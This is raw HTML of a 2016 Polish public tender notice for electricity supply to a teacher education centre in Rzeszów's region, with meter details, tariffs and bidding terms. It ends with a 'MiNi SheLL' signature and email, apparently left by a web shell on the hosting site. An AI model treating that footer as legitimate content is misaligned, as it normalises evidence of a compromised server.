                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Część I 
1)	zmiany cen jednostkowych Wykonawcy za wykonanie zamówienia, 
w przypadku zmiany powszechnie obowiązujących przepisów prawa 
w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym ustawowej stawki podatku od towarów i usług, podatku akcyzowego lub ogólnie obowiązujących przepisów prawa, a w szczególności zmiany Ustawy Prawo energetyczne, Ustawy o efektywności energetycznej lub przepisów wykonawczych wprowadzających dodatkowe obowiązki związane 
z zakupem praw majątkowych lub certyfikatów dotyczących efektywności energetycznej.
2)	zmiany terminu wykonania zamówienia w przypadku wystąpienia:
a)	siły wyższej. Siła wyższa  oznacza wydarzenie nieprzewidywalne i poza kontrolą stron umowy występujące po podpisaniu umowy, 
a powodujące niemożliwość wywiązywania się z umowy w jej obecnym brzmieniu,
b)	innych uzasadnionych przyczyn pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
3)	wielkości mocy umownej, w przypadku zmiany tej mocy w umowie 
o świadczenie usług dystrybucji energii elektrycznej zawartej przez Zamawiającego z OSD.
Część II 
1)	zmiany cen jednostkowych Wykonawcy za wykonanie zamówienia, 
w przypadku zmiany powszechnie obowiązujących przepisów prawa 
w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym ustawowej stawki podatku od towarów i usług, podatku akcyzowego lub ogólnie obowiązujących przepisów prawa, a w szczególności zmiany Ustawy Prawo energetyczne, Ustawy o efektywności energetycznej lub przepisów wykonawczych wprowadzających dodatkowe obowiązki związane z zakupem praw majątkowych lub certyfikatów dotyczących efektywności energetycznej. Ceny i stawki opłat z tytułu dystrybucji energii elektrycznej ulegną także zmianie w przypadku zmiany Taryfy OSD, zatwierdzonej przez Prezesa URE.
2)	zmiany terminu wykonania zamówienia w przypadku wystąpienia:
a)	siły wyższej. Siła wyższa  oznacza wydarzenie nieprzewidywalne 
i poza kontrolą stron umowy występujące po podpisaniu umowy, 
a powodujące niemożliwość wywiązywania się z umowy w jej obecnym brzmieniu,
b)	innych uzasadnionych przyczyn pod warunkiem, że zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
3)	wielkości mocy umownej -  w przypadku wystąpienia uzasadnionych przyczyn, których nie można było przewidzieć w chwili zawarcia umowy.

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 21/10/2016, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Wykonawca przed podpisaniem umowy winien przedłożyć Zamawiającemu: 
1)	dokument stwierdzający, iż osoba/osoby, które będą podpisywały umowę posiadają prawo do reprezentowania Wykonawcy, o ile wcześniej takiego dokumentu nie złożył,
2)	umowę regulującą współpracę  w przypadku złożenia oferty przez Wykonawców wspólnie ubiegających się o zamówienie, zgodnie z art. 23 ust. 4 ustawy,
3)	informacje dotyczące osób podpisujących umowę oraz osób upoważnionych do kontaktów w ramach realizacji umowy.
4)	umowę dystrybucyjną dla realizacji usługi dystrybucji energii elektrycznej w przypadku, gdy Wykonawca nie jest właścicielem sieci dystrybucyjnej, na terenie której znajduje się obiekt Zamawiającego  dotyczy części II zamówienia.
W przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonych w ofercie dokumentów  pełnomocnictwo. 
Jeżeli Wykonawcę reprezentuje pełnomocnik do oferty musi być załączone pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy (np. według załącznika nr 5 do SIWZ).
Pełnomocnictwo musi być złożone w formie oryginału lub notarialnie potwierdzonej kopii.

</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>Dostawa energii elektrycznej na potrzeby Podkarpackiego Centrum Edukacji Nauczycieli w Rzeszowie w 2017 roku.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa energii elektrycznej w 2017 r. zgodnie z przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (t. j. Dz. U. z 2012 r. poz. 1059 z późn. zm.) oraz z obowiązującymi standardami jakościowymi obsługi odbiorców określonymi w ww. ustawie i aktach wykonawczych do:

1.	Budynku bazy dydaktyczno-noclegowej Podkarpackiego Centrum Edukacji Nauczycieli w Rzeszowie Oddziału w Przemyślu, ul. Kraszewskiego 7a, 37-700 Przemyśl 
a)	Grupa przyłączeniowa: V 
b)	Moc umowna wynosi 25 kW, przy współczynniku tgf=0,4 
c)	Licznik nr 95836356 
d)	PPE PLZKED10001645075 
e)	Moc przyłączeniowa Pp=40 kW 
f)	Grupa taryfowa C11 
g)	Miejsce dostarczania energii elektrycznej stanowią zaciski wejściowe zabezpieczeń głównych 
h)	Miejsce usytuowania układu pomiarowo-rozliczeniowego: wewnątrz budynku 
i)	Szacunkowe zapotrzebowanie na energię elektryczną w przewidzianym okresie obowiązywania umowy wynosi 22 300 kWh. 

2.	Budynku garażu Ośrodka Edukacji Nauczycieli i Pracowników Administracji Samorządowej w Czudcu, ul. Rzeszowska 82, 38-120 Czudec
a)	Grupa przyłączeniowa: V 
b)	Moc umowna wynosi 4 kW, przy współczynniku tgf =0,4 
c)	Licznik nr 20268430 
d)	PPE 480548101007248847 
e)	Moc przyłączeniowa Pp=16 kW 
f)	Grupa taryfowa C11 
g)	Miejsce dostarczania energii elektrycznej: zaciski prądowe na wyjściu przewodów od zabezpieczenia w złączu w kierunku instalacji odbiorcy 
h)	Miejsce usytuowania układu pomiarowo-rozliczeniowego: wewnątrz budynku garażu
i)	Szacunkowe zapotrzebowanie na energię elektryczną w przewidzianym okresie obowiązywania umowy wynosi 20 kWh. 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>09300000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin realizacji zamówienia: 01.01.2017 r. - 31.12.2017 r.<br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Dostawa energii elektrycznej na potrzeby Podkarpackiego Centrum Edukacji Nauczycieli w Rzeszowie w 2017 roku.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Dostawa energii elektrycznej i usługi jej dystrybucji (umowa kompleksowa dostawy energii elektrycznej) zgodnie z przepisami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne  (Dz. U. z 2012 r. poz. 1059 z późn. zm.) oraz zgodnie z obowiązującymi standardami  jakościowymi obsługi odbiorców określonymi w ww. ustawie oraz aktach wykonawczych do:
Ośrodka Edukacji Nauczycieli i Pracowników Administracji Samorządowej w Czudcu ul. Rzeszowska 82, 38-120 Czudec.

a) Grupa przyłączeniowa: III 
b) Moc umowna wynosi 55 kW, przy współczynniku tgf =0,4 
c) Licznik nr  10891027     
d) PPE 480548201000007732 
e) Moc przyłączeniowa Pp=25 kW 
f) Grupa taryfowa B22 
g) Miejsce dostarczania energii elektrycznej: zaciski prądowe na głowicy kablowej 
w polu nr 4 SN stacji transformatorowej Czudec Szkoła zasilanej linią 15 kV Boguchwała Strzyżów. Linia kablowa SN, stacja transformatorowa INSTAL oraz pozostałe urządzenia nN są zlokalizowane na nieruchomości zamawiającego.
h) Miejsce usytuowania układu pomiarowo-rozliczeniowego: rozdzielnia pomiarowa SN i nN w stacji transformatorowej INSTAL w Czudcu. 
i) Szacunkowe zapotrzebowanie na energię elektryczną w przewidzianym okresie obowiązywania umowy wynosi 103 300 kWh. 

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>09300000-2, 65310000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Termin realizacji zamówienia: 01.01.2017 r. - 31.12.2017 r.<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com